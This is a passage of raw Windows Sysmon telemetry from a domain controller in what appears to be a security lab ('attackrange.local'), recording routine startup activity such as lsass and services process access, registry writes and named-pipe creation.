12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1abdc|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+3735d|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-6467-6064-0200-00000000AE01}432440C:\Windows\System32\smss.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6c14|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5182f 13241300x80000000000000001076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.502{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x80000000000000001075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.502{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 13241300x80000000000000001074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.502{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\RPC-EPMap\CollectionBinary Data 10341000x80000000000000001073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.471{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0700-00000000AE01}696C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.471{266CAFBE-646A-6064-0700-00000000AE01}696\Winsock2\CatalogChangeListener-2b8-0C:\Windows\system32\wininit.exe 17141700x80000000000000001070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.471{266CAFBE-646C-6064-0D00-00000000AE01}612\epmapperC:\Windows\system32\svchost.exe 10341000x80000000000000001069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.471{266CAFBE-646C-6064-0C00-00000000AE01}592692C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+46868|c:\windows\system32\rpcss.dll+3a983|c:\windows\system32\rpcss.dll+3a8ee|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.456{266CAFBE-646C-6064-0D00-00000000AE01}612\Winsock2\CatalogChangeListener-264-0C:\Windows\system32\svchost.exe 10341000x80000000000000001067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.456{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.456{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.440{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.440{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.424{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.424{266CAFBE-646A-6064-0A00-00000000AE01}840844C:\Windows\system32\services.exe{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a423|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.409{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.409{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.409{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.377{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.252{266CAFBE-646A-6064-0A00-00000000AE01}840932C:\Windows\system32\services.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.252{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.252{266CAFBE-646A-6064-0A00-00000000AE01}840844C:\Windows\system32\services.exe{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+1a698|C:\Windows\system32\services.exe+1a391|C:\Windows\system32\services.exe+20187|C:\Windows\system32\services.exe+21f27|C:\Windows\system32\services.exe+2486c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.251{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.237{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:43.674{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database EpochDWORD (0x000067ec) 10341000x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:43.002{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:43.002{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24cea|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 